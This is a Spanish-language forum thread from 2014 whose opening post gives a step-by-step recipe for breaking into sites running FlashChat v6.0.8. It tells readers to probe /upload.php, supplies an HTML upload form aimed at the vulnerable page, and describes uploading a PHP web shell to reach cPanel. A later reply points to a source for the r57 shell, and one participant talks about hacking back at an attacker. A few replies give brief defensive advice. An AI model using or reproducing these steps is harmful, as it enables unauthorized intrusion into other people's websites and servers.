Título: FlashChat v6 0 8 Hack /upload.php Publicado por: andygrimm en 2 Abril 2014, 06:19 am NO SOY EL DESCUBRIDOR DE ESTO, SIMPLEMENTE QUIERO APORTARLO.
1- Bueno para empezar hay que entrar en alguna pagina de FlashChat v6 0 8 y añadirle a la pagina el /upload.php , ejemplo: pagina.com/upload.php, si da una pagina en blanco con algun mensaje en texto, significa que es vulnerable. 2- Ya que tengamos la pagina vulnerable, creamos un archivo de texto con el siguiente codigo: <form action="http://pagina.com/upload.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="Submit"> </form> Donde dice "action=" ahi ponemos la pagina vulnerable, lo guardamos con la extension .html. 3- Estando en la pagina vulnerable ejecutamos el archivo creado, y de ahi, subimos nuestro shell.php y ya podriamos logear en el cpanel. Bueno eso fue todo, cualquier duda o consulta ya saben, consulten, suerte! By andygrimm Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: Simbita201 en 3 Junio 2014, 17:29 pm Gracias por el aporte, pero donde encuentro el Shell.php .
Salu2 Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: engel lex en 3 Junio 2014, 19:34 pm Gracias por el aporte, pero donde encuentro el Shell.php . Salu2 >.> en serio? eso lo haces tu Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: Simbita201 en 3 Junio 2014, 20:35 pm no tengo ni idea, me hachearon el chat y lo intnto recuperar
salu2 Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: engel lex en 4 Junio 2014, 01:13 am Metete a tu server, borra todo y monta tu respaldo
Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: Sh4k4 en 4 Junio 2014, 08:38 am Citar http://www.r57shell.net/ atasquece..Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: Simbita201 en 4 Junio 2014, 10:40 am Metete a tu server, borra todo y monta tu respaldo Gracias amigo. No es la primera vez que me lo hace el mismo individuo, trato de saber recuperarlo, a su estilo, para demostrarle que puedo hacerlo y que me deje en paz. Salu2 Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: Simbita201 en 4 Junio 2014, 10:42 am atasquece.. Muchas Gracias, lo intentare, solo es cuestión de mostrarle al que me hachea, que tb soy capaz de hacerlo, espero asi se olvide de mi. Salu2 Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: engel lex en 4 Junio 2014, 13:38 pm ??? o suena a una excusa! XD puedes colocar un filtro en esa parte del sistema ya que sabes por donde sube y listo adíos ataque shell... es uno de los ataque más faciles de bloquear! XD
Título: Re: FlashChat v6 0 8 Hack /upload.php Publicado por: Simbita201 en 4 Junio 2014, 19:15 pm Si supiera hacer esas cosas, con el priemer ataque me hubiera bastado, lo habría solucionado.
Gracias Edito. Gracias Engel, no me ha funcionado, error 404 sañu2 |